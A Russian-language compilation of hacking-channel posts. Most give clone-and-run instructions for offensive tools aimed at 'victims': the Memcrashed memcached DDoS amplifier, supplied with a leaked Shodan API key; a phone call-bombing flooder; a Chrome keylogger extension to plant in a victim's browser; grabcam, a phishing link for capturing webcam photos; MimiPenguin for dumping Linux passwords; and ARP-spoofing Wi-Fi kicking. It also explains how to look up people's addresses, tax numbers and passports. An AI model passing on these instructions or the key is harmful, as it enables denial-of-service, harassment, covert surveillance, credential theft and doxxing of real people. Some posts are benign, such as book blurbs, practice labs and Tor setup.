​Базы данных для пробива граждан РФ (СНГ) Часть 2

Данная инструкция предназначена для проверки своих контрагентов, клиентов, друзей, знакомых проживающих в России, Белоруссии, Украине, Казахстане, Молдавии и Латвии.

1. Проверяем есть ли у человека машина

Заходите на сайт Базы ГИБДД ( http://www.nomer.org/mosgibdd ), правда база старовата, но полезной информации тут очень много. 

2. Узнаем адрес прописки человека и его домашний телефон

Заходите в Адресный справочник ( http://telkniga.com ) выбираете свою страну, затем город, вбиваете ФИО проверяемого. 

3. Проверяем задолженность по налогам

Заходите на сайт Федеральной Налоговой Службы ( https://service.nalog.ru/debt ) внимательно читаете условия проверки и соглашаетесь с ними.

4. Узнаем номер ИНН

Заходите на сайт Федеральной Налоговой Службы ( https://service.nalog.ru/debt ) переходите по ссылке на заполнение формы запроса, заполняете ее и в ответ получаете номер ИНН

4. Проверка действительности паспорта гражданина РФ

Заходите на сайт Федеральной Миграционной Службы ( https://service.nalog.ru/inn.do ) в соответствующих полях вбиваете Серию, Номер паспорта, капчу (код на картинке).

​Memcrashed - самый мощный DDoS

Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов.

Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Последствия и мощность просто поражают - 28 февраля 2018 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Установка:

▫️git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
▫️pip install shodan
▫️pip install scapy
▫️pip install -r requirements.txt
▫️cd /Memcrashed-DDoS-Exploit

Использование:

▫️python3 Memcrashed.py

Memcrashed просит ввести ему валидный ApiKey. Его можно попробовать поискать на GitHub по: api key & ApiKey & ApiKey Shodan.

Но так-же есть небольшой подарок для вас, рабочий ключ "PSKINdQe1GyxGgecYz2191H2JoS9qvgD"

​​​Пробив по IP адресу

Хочу поведать тебе как с помощью Termux можно реально пробить человека по IP.

IP (Межсетевой протокол) - это так назфваемый маршрутизируемый протококол сетевого уровня TCP/IP.

Именно IP стал тем протоколом, который объединил отдельные компьютерные сети во всемирную сеть интернет. Неотъемлемой частью протокола является адресация сети.

Установка:
▫️git clone https://github.com/maldevel/IPGeoLocation
▫️cd IPGeoLocation
▫️chmod +x *
▫️pip install -r requirements.txt

Использование:
▫️python ipgeolocation.py -t [

Сразу после ввода IP, вы получите такую информацию, как: Страну, город, геоданные, провайдер, индекс и т.д.

[Книга] Ловушка для багов. Полевое руководство по веб-хакингу📔

Данная книга познакомит вас с так называемым "Белым" хакерством. Поиск уязвимостей в системах безопасности, обнаружение всяческих лазеек, как обезопасить себя и многое другое ждём вас в данной книге.

​​​Фреймворк MR. ROBOT

Думаю, что многие смотрели сериал «MR. ROBOT». В данном сериале действует группировка хакеров «Fsociety»(fuck society). Суть этого фреймворка в том, что он имеет набор всех утилит, которые использовались в сериале.

Установка:
▫️git clone https://github.com/Manisso/fsociety
▫️cd fsociety

Использование:
▫️sudo fsociety

Вы увидите меню фреймворка, в котором есть 8 разделов:
- Information Gathering
- Password Attacks
- Wireless Testing
- Exploitation Tools
- Sniffing & Spoofing
- Web Hacking
- Private Web Hacking
- Post Exploitation

Выбираем и устанавливаем.

​​​Спам звонками в Termux

CALL Bomber - это более усовершенствованная версия SMS Bomber'a, только тут для атаки используются не SMS, а звонки. Максимально эффективная и быстрая атака, которая точно не оставит жертву в покое, пока она не будет отключена.

Установка:

▫️ apt install git python3-pip python3
▫️ pip3 install requests transliterate pyarmor
▫️ git clone https://github.com/pentestxr/Fludilka.git
▫️ cd Fludilka
▫️ cd Termux

Использование:

▫️ python fludilka.py

Далее вводим номер.
Готово! Атака началась, теперь жертве будут без перебоя идти звонки, один за одним.

​​Как отключать пользователей от сети WiFi?

В данном посте пойдёт речь про утилиту KickThemOut, позволяющую удалять пользователей из Вашей сети, дабы исключить нежелательные подключения и предоставить себе всю пропускную способность сети.

Инструмент позволяет выбрать и удалить определенные устройства или исключить сразу все, а ARP подменяет их из вашей локальной сети.

Установка:

▫️sudo apt-get update && sudo apt-get install nmap
▫️git clone https://github.com/k4m4/kickthemout.git
▫️cd kickthemout/
▫️sudo -H pip3 install -r requirements.txt

Использование:

▫️sudo python3 kickthemout.py

Далее всё интуитивно понятно.
📔GitHub проекта

​​Вручную создаём кейлоггер для браузера Chrome [Linux]

В данном посте пойдёт речь про одну интересную утилиту Hera, с её помощью можно без особого труда создать собственный кейлоггер для браузера Chrome, который в свою очередь будет присылать вам всю информацию, введенную жертвой.

Установка:

▫️git clone https://github.com/UndeadSec/HeraKeylogger
▫️cd HeraKeylogger
▫️sudo apt-get install python3-pip -y
▫️sudo pip3 install -r requirements.txt

Использование:

▫️python3 hera.py

Созданный кейлоггер будет в папке утилиты под названием "MaliciousExtension". Вам нужно установить его в браузер жертвы, далее он будет присылать вам все нажатия клавиш.

​​Как сделать терминал Termux более красивым?

В данном посте пойдёт речь про одну насущную проблему, а именно оформление терминала Termux. Почему насущную? По себе знаю, что каждому "хакеру" приятно, когда его рабочее место оформлено более красиво, а не чисто в ЧБ стилистике. В этом нам поможет утилита Termux-Banner.

Установка:

▫️git clone https://github.com/Bhai4You/Termux-Banner
▫️chmod +x requirement.sh
▫️chmod +x t-ban.sh
▫️bash requirement.sh

Использование:

▫️bash t-ban.sh

Далее вам будет предложено множество оформлений на любой вкус, достаточно просто выбрать цифру и готово! А чтобы убрать установленое оформление следует прописать команду: "bash remove.sh".

[Книга] ​​Искусство быть невидимым📔
Кевин Митник

Думаете, ваши данные в Интернете хорошо защищены? Так глубоко вы никогда не заблуждались! Кевин Митник - самый разыскиваемый хакер планеты в прошлом, а ныне один из ведущих специалистов по кибербезопасности, знает, насколько опасна неосведомленность в вопросах защиты данных в сети.

​​​Как вычислить IP по почте

В этом посте пойдет речь о способе вычисления IP по почте. У многих, наверное, была такая ситуация, что вам на почту приходило оповещение от достаточно популярных сервисов с просьбой о смене данных, либо осуществить повторную авторизацию.

С помощью данного способа вы сможете определить местонахождения отправителя по таким данным, как: широта, долгота, высота над уровнем моря.

Инструкция:

1) Откройте письмо, которое считаете подозрительным и кликните по 3-м точкам.

2) Нажмите на пункт "Показать оригинал".

3) В открывшейся вкладке найдите строку Received: from

4) Там вы сразу увидите IP хоста отправителя.

Готово. Пользуйтесь!

​​Взлом веб-камер с обычного телефона

В данном посте пойдет речь об одном хорошем инструменте, с помощью которого можно без каких-либо проблем взламывать веб-камеры пользователей.

Установка:

▫️ git clone https://github.com/noob-hackers/grabcam
▫️ cd grabcam
▫️ chmod +x grabcam.sh
▫️ bash grabcam.sh

После выполнения последней команды, включите на своем устройстве 2 пункта - "Мобильный интернет" и "Точка доступа Wi-Fi".

Возвращаемся к терминалу и выбираем пункт "Ngrok". Далее будет сгенерирована специальная ссылка, кидаем её жертве и ждём. В случае успеха, для просмотра фотографий введите команду:
▫️ termux-open cam название.png

​​Блокировка IPhone голосом

Представьте ситуацию, что кто-то выхватил у вас разблокированный телефон и не хочет его отдавать. Это может быть как ваш друг, так и злоумышленник. Что делать в такой ситуации?

Вариантов много, но один из них - включить заблаговременно функцию блокировки телефона голосом:

1. Откройте "Настройки" / "Settings" iPhone.
2. Перейдите в "Универсальный доступ" / "Accessibility".
3. Выберите "Управление голосом" / "Voice Control".

После этого, находясь рядом с телефоном, вы можете произнести "Заблокировать экран" / "Lock screen".

В результате, завладевший вашим телефоном не сможет ничего с ним сделать, так как отобразится окно разблокировки смартфона.

​​​​Рабочие альтернативы Shodan

В данном посте пойдёт речь про аналоги поисковику Shodan.

1. FOFA — Представляет он из себя поисковик китайского сегмента, который имеет достаточно конкурентный, по сравнению с Shodan, результат поиска по порту "port: 80". Его количество найденных устройств составляет 5 804 777 в то время как Shodan находит 246 996 устройств.

2. ZoomEye — Показатели результата поиска являются наибольшими из всего данного списка и составляют 318 893 041 устройства по запросу "port: 80". Также, неоспоримым плюсом данного сервиса является наличие интерфейса на английском языке.

3. Censys — Хотя данный поисковик уже не сможет удивить нас количеством найденных устройств, но все же он не хуже того же Shodan. Минус данного поисковика состоит в том, что для его использования необходима регистрация пользователя.

[Книга] ​Основы веб-хакинга. Как зарабатывать деньги этичным хакингом📔

«Основы веб-хакинга» рассказывает об этичном использовании софта для поиска уязвимостей в безопасности и о том, что научиться взламывать не всегда легко. После прочтения этой книги ваши глаза откроются, и вы увидите огромное количество существующих уязвимостей, и вы вряд ли когда-либо сможете смотреть на сайт или API прежними глазами.

​​Подборка сайтов для тренировок в хакерстве

В данном посте пойдёт речь про сервисы для тренировки хакерских дела. Пентент, тестирование на проникновение, написание вредоносного кожа и так далее.

1. https://w3challs.com/ — обучающая платформа, включающая хакинг, варгеймы, форензику, криптографию, стеганографию и программирование.

2. https://defendtheweb.net/?hackthis — разработан для того, чтобы научить вас взламывать, дампать, дифейсить и защищать свой сайт от хакеров.

3. https://ctf365.com/ — здесь устанавливают и защищают свои собственные серверы одновременно с атаками на серверы других пользователей.

4. http://reversing.kr/index.php — здесь вы можете найти 26 задач для проверки ваших навыков взлома и реверс-инжинеринга.

5. https://hellboundhackers.org/ — этот ресурс предлагает широкий спектр проблем с целью научить идентифицировать и устранять эксплойты.

​​​Как взломать пароль от root-пользователя Kali Linux?

Получить пароль суперпользователя Linux можно и в загрузчике, однако если к нему доступа нет, то в бой могут пойти отдельные утилиты.

Одной из таких является MimiPenguin. Изначально она специализировалась только на Kali Linux, но теперь в список поддерживаемых ОС добавились Ubuntu, Archlinux, OpenSUSE и другие.

Установка:
▫️git clone https://github.com/huntergregal/mimipenguin
▫️cd mimipenguin

Использование:
▫️./mimipenguin.sh

После чего в терминале появится список пользователей, с паролем к каждому. Помимо версии на bash, существует также реализация MimiPenguin на Python. Находится она в том же самом репозитории.

​​​Как превратить Telegram в облачное хранилище

@uploadgrammebot — бот, который который позволяет использовать Telegram для обмена файлами. А поскольку по умолчанию мессенджер предлагает возможность обмена данными в неограниченных объёмах, у пользователей появился безлимитный файлообменник совершенно бесплатно.

Для того, чтобы загрузить файлы нужно:

1. Запустить бота Uploadgram себе в Telegram @uploadgrammebot

2. Принять соглашение пользователя "Accept"

3. Загрузить в чат с ботом любой файл, который хотите отправить.

4. Дождаться окончания его загрузки и создания ссылки на него.

Готово, ссылку, которую вам предоставит Uploadgram, можно отправить пользователю, для которого и предназначался файл.

​​Подборка хакерских сообществ

В данном посте будет представлена подборка из хакерских сообществ, форумов и так далее.

Список:

1. Hack Forums — Этот форум предназначеный не только для хакеров, но и для веб-разработчиков, блогеров, геймеров, программистов, графических дизайнеров и веб-маркетологов.

2. Evil Zone — это форум, созданный специально для хакеров. Обсуждаются также наука, программирование и искусство.

3. Hellbound Hackers — предоставляет учебники по хакерству и инструменты для пентеста.

4. HackThisSite — это легальный и безопасный ресурс сетевой безопасности, где вы можете проверить свои навыки взлома на различных задачах и узнать больше о сетевой безопасности.

​​​​Подборка лабораторий для практики веб-пентеста

В данном посте будет представлена небольшая подборка уязвимых приложений, для поиска различных типов уязвимостей:

1. SQLi
https://github.com/Audi-1/sqli-labs

2. Oauth 2.0
https://github.com/koenbuyens/Vulnerable-OAuth-2.0-Applications

3. GraphQL
https://github.com/david3107/graphql-security-labs

4. JWT Authentication
https://github.com/Sjord/jwtdemo

5. SAML Authentication
https://github.com/yogisec/VulnerableSAMLApp

6. XSS
https://portswigger.net/web-security/cross-site-scripting

7. Web Cache Poisoning
poison.digi.ninja

​​​Анонимно выходим в сеть с помощью Tor-Router!

Tor Router позволяет вам использовать сеть TOR в качестве прозрачного прокси-сервера и отправлять весь ваш трафик, включая DNS-запросы, через TOR.

Tor router не трогает системные файлы, как это делают остальные инструменты для маршрутизации трафика. Причина этого в том, что нет необходимости изменять файлы для маршрутизации трафика, так как сбой в скрипте может нарушить ваше системное соединение.

Установка:
▫️git clone https://github.com/edu4rdshl/tor-router
▫️cd tor-router/files

Открываем файл torrc через текстовый редактор:
▫️sudo nano /etc/tor/torrc

И добавляем в файл следующий текст:
Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

После этого перезапускаем службу TOR:
▫️sudo systemctl restart tor

Использование:
▫️./tor-router

Теперь весь ваш трафик проходит через сеть TOR. Проверить это можно на на check.torproject.org. Для тестов DNS: dnsleaktest.com.